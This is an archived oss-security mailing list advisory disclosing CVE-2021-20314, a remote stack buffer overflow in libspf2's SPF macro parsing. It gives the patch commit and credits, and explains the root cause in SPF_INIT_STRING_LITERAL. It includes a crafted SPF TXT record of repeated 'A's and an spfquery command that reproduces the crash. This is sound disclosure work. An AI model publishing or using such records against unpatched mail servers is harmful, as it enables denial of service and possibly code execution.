Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Message-ID: <dde792a9-3531-9057-70a4-c4a9b60b90fd@sit.fraunhofer.de>
Date: Wed, 11 Aug 2021 16:41:16 +0200
From: "Philipp Jeitner (SIT)" <philipp.jeitner@....fraunhofer.de>
To: <oss-security@...ts.openwall.com>
Subject: CVE-2021-20314: Remote stack buffer overflow in libspf2

#### Description

Stack buffer overflow in libspf2 versions below 1.2.11 when processing 
certain SPF macros can lead to Denial of service and potentially code 
execution via malicious crafted SPF explanation messages. CVE-2021-20314 
has been assigned to this issue.

#### Attack type

Remote

#### Impact

(x) Code Execution (x) Denial of Service

#### Attack vector(s):

Attackers need to cause a mail server to process a malicious SPF record, 
ie. via sending an email from an attacker-controlled domain. Thus, any 
mail server accepting mails and processing them via libspf2 is vulnerable.

#### Patch

The issue has been fixed in github commit c37b7c1:

https://github.com/shevek/libspf2/commit/c37b7c13c30e225183899364b9f2efdfa85552ef

An updated version of libspf2 (1.2.11) which also fixes other security 
related issues is available from github 
(https://github.com/shevek/libspf2). The libspf2 website 
(https://www.libspf2.org/download.html) and latest release there is NOT 
UPDATED YET.

#### Discoverer(s)/Credits

Philipp Jeitner and Haya Shulman, Fraunhofer SIT

philipp.jeitner@....fraunhofer.de
haya.shulman@....fraunhofer.de

#### Reference(s)

  - libspf2: https://www.libspf2.org/, https://github.com/shevek/libspf2
  - patch: 
https://github.com/shevek/libspf2/commit/c37b7c13c30e225183899364b9f2efdfa85552ef
  - Injection Attacks Reloaded: Tunneling Malicious Payloads over DNS 
https://www.usenix.org/conference/usenixsecurity21/presentation/jeitner

#### Details and information to reproduce the vulnerability

To reproduce, set the SPF record of a domain you control like listed below:

     example.com. 300    IN      TXT     "v=spf1 exp=exp.example.com"
     exp=exp.example.com.   300     IN      TXT 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

Then trigger SPF processing in libspf2, ie. via the command line 
`spfquery` tool.

     # spfquery --sender someone@...mple.com -ip 1.2.3.4
     *** stack smashing detected ***: terminated
     Aborted (core dumped)

The record causes a 4-byte stack buffer overflow of local variable `buf` 
in `SPF_record_compile_macro`, which is responsible for parsing the 
potential macros included in the SPF explanation message. The overflow 
is caused by an incorrect buffer length adjustment in the 
`SPF_INIT_STRING_LITERAL` macro  which  places  a  4-byte  header of 
type `SPF_data_str` into  the  buffer inside `buf` without  decreasing 
the  available size `ds_avail` by 4. Exploiting this vulnerability 
therefore allows  the  attacker to  override  up to  4  bytes  on  the 
stack of `SPF_record_compile_macro` directly after `buf`.

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.